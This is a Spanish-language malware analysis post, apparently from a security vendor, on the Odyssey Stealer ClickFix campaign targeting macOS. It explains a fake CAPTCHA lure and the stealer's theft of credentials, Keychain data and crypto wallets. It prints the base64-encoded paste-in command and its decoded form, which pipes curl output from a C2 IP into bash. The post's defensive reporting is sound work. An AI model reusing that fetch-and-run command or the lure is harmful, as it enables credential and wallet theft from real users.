Odyssey Stealer: ClickFix Malware Ataca a Usuarios de macOS para Obtener Credenciales y Detalles de Carteras Cripto

Hace unos meses, X-Labs publicó una investigación sobre cómo un ataque ClickFix entregó malware a través de sistemas Windows. Desde entonces, los investigadores de X-Labs han estado monitoreando un aumento en la actividad de malware en forma de una campaña de phishing que apunta a macOS mediante una técnica ClickFix que entrega malware diseñado para robar credenciales.

El ataque se lleva a cabo utilizando una técnica ClickFix donde el atacante construye una página de verificación CAPTCHA falsa. Esta técnica es una mezcla de phishing e ingeniería social que se ejecuta sin dejar caer un binario en el sistema. El CAPTCHA puede ser diseñado por el atacante basado en la identificación del sistema operativo.

Análisis técnico de Odyssey Stealer

Al navegar inicialmente por la URL "hxxps://tradingviewen[.]com" en sistemas Windows y macOS, los usuarios son llevados a una página web donde se requiere verificación CAPTCHA y se les pide realizar varias acciones.

Página web después de navegar en sistema Windows:

Fig. 1 - Instrucciones en Windows
 

Página web después de navegar en sistema macOS

Fig. 2 - Instrucciones en macOS
 

Al realizar la acción requerida y pegar el contenido en un terminal, obtenemos el siguiente código.

• echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXNoICY=" | base64 -d | bash

El Base64 en el comando se resuelve a una URL que aloja un script malicioso.

• echo "curl -s hxxp://45.146.130[.]131/d/vipx14350 | nohup bash &" | base64 -d | bash

La URL “hxxp://45.146.130[.]131/d/vipx14350” aloja un AppleScript altamente ofuscado. Examinaremos este AppleScript más adelante en esta publicación.

Cuando navegamos por la URL real “hxxps://tradingviewen[.]com” la página web detecta el sistema operativo del usuario y muestra instrucciones personalizadas para macOS o Windows. A continuación se muestran los comandos que se muestran cuando se realizan operaciones en macOS y Windows.

1- En Windows, cuando el usuario realiza la acción win + R, escribe PowerShell, hace clic en copiar y realiza pegar (ctrl + v), simplemente pega un comando genérico de Windows.

2- En macOS, cuando el usuario realiza la acción con command + espacio, abre el terminal, hace clic en copiar y pega el comando en el terminal, pega un comando malicioso que se ejecuta usando bash.

Desglosando la carga útil de AppleScript

Cuando el comando se está ejecutando en el terminal, pide al usuario que ingrese la contraseña del usuario para realizar más acciones, lo que resulta en la recopilación de datos sensibles de dispositivos macOS y su envío al servidor remoto.

Al descargar y realizar un análisis inicial del script, lo vemos como un archivo compilado de AppleScript (.scpt) que utiliza “osascript” para ejecutar automáticamente el AppleScript. El script tiene cadenas generadas aleatoriamente para propósitos de ofuscación, lo que hace que el análisis sea más difícil. Sin embargo, al limpiar las cadenas excesivas del script, pudimos analizar con éxito el comportamiento del código.

Inicialmente, el script utiliza “mkdir” para crear un directorio, específicamente dentro del directorio “/tmp”.

Fig. 3 - Inicio del script y creación de directorio
 

El propósito principal del script es leer extensiones de navegador, carteras cripto y extraer nombres de usuario y contraseñas.

Recopilación general de archivos del Escritorio y Documentos

La imagen a continuación muestra la recopilación de archivos de la carpeta Escritorio y Documentos del usuario basada en extensiones como .txt, .pdf, .docx, .key y otras.

Además de estos, el script también recopila cookies de Safari, notas de Apple y archivos de Keychain.

Fig. 4 - Recopilación de archivos

Detección de carteras cripto en Firefox y enumeración de navegadores basados en Chromium

El script también apunta a navegadores como Firefox y Chrome para robar cookies, inicios de sesión guardados, historial de formularios, cifrado y claves de cifrado copiándolos al directorio de trabajo temporal como se muestra en Fig. 5 y 6.

También apunta a navegadores basados en Chromium como Google Chrome, Brave, Microsoft Edge, Opera y otros. Enumera perfiles de usuario y extrae cookies, datos de autocompletar, credenciales de inicio de sesión y configuraciones de extensiones. Lo principal a enfocarse en navegadores basados en Chromium son las extensiones que coinciden con carteras cripto conocidas como Electrum, Exodus, Litecoin, Wasabi y muchas más.

Escanea sus directorios de almacenamiento local e indexedDB, lo que asegura que cualquier información relacionada con carteras almacenada también sea exfiltrada.

Fig. 5 - Recopilación de datos basada en Firefox

Fig. 6 - Enumeración del navegador Chrome basado en Chromium

El proceso de exfiltración de datos

Después de recopilar la información requerida, el script configura el mecanismo de exfiltración y empaqueta todo en un archivo ZIP. El archivo se guarda en /tmp/out.zip. La función de datos carga el archivo a “hxxp://45.146.130[.]131/log” usando un comando curl.

Fig. 7 - Exfiltración de datos

Cuando intentamos navegar por la IP: 45.46.130[.]131 nos lleva a la página de inicio de sesión del panel de control de Odyssey Stealer, al cual el atacante podría acceder para ver los datos recolectados.

Fig. 8 - Página de inicio de sesión de Odyssey Stealer

Limpieza final después de la exfiltración de datos

Después de que los datos han sido enviados al servidor, el script elimina el directorio /tmp que contiene el archivo zip y el directorio de trabajo para eliminar rastros de actividad, haciendo que el análisis forense sea difícil.

Conclusión

A través de esta publicación de blog, cubrimos cómo el ataque ClickFix evolucionó para cambiar de atacar máquinas Windows a macOS. A través de técnicas de ofuscación, los atacantes evaden los mecanismos de detección tradicionales con un ataque de ingeniería social basado en terminal.

Aquí, vimos que el atacante creó una página web CAPTCHA falsa que verifica el sistema operativo antes de la ejecución adecuada del malware. Cuando se detecta el sistema operativo correcto, la URL atrae a los usuarios a realizar varias instrucciones mencionadas en la página web y desencadena la ejecución del malware. La ejecución se lleva a cabo siguiendo el comando “base64 -d | bash” que decodifica el código codificado en base64 y se ejecuta en el terminal bash. El código decodificado en base64 está vinculado a un AppleScript malicioso (.scpt) que recopila información sensible como datos de carteras cripto, extensiones de navegador, cookies, sesiones, llaveros guardados, nombres de usuario y contraseñas del sistema. Al capturar con éxito los datos, los almacena en “/tmp/out.zip” y luego exfiltra el archivo a su C2.

La conclusión de este análisis técnico: Los atacantes utilizan una combinación de técnicas de phishing e ingeniería social para evadir métodos de detección comunes y exfiltrar datos sin la necesidad de dejar caer binarios en el sistema.

Declaración de Protección

• Etapa 2 (Atracción) – Las URLs maliciosas asociadas con estos ataques son identificadas y bloqueadas.
• Etapa 5 (Archivo Dropper) – El AppleScript malicioso (.scpt) ha sido añadido a la base de datos maliciosa de Forcepoint y está bloqueado.
• Etapa 6 (Llamada a Casa) – Los servidores C2 categorizados bajo la categoría de seguridad están bloqueados.
   

Declaración de Protección NGFW

El sitio de phishing es detectado con la huella "File-Text_Information-Stealer-Using-Fake-Browser-Dialogs" desde dynup 1845.

IOCs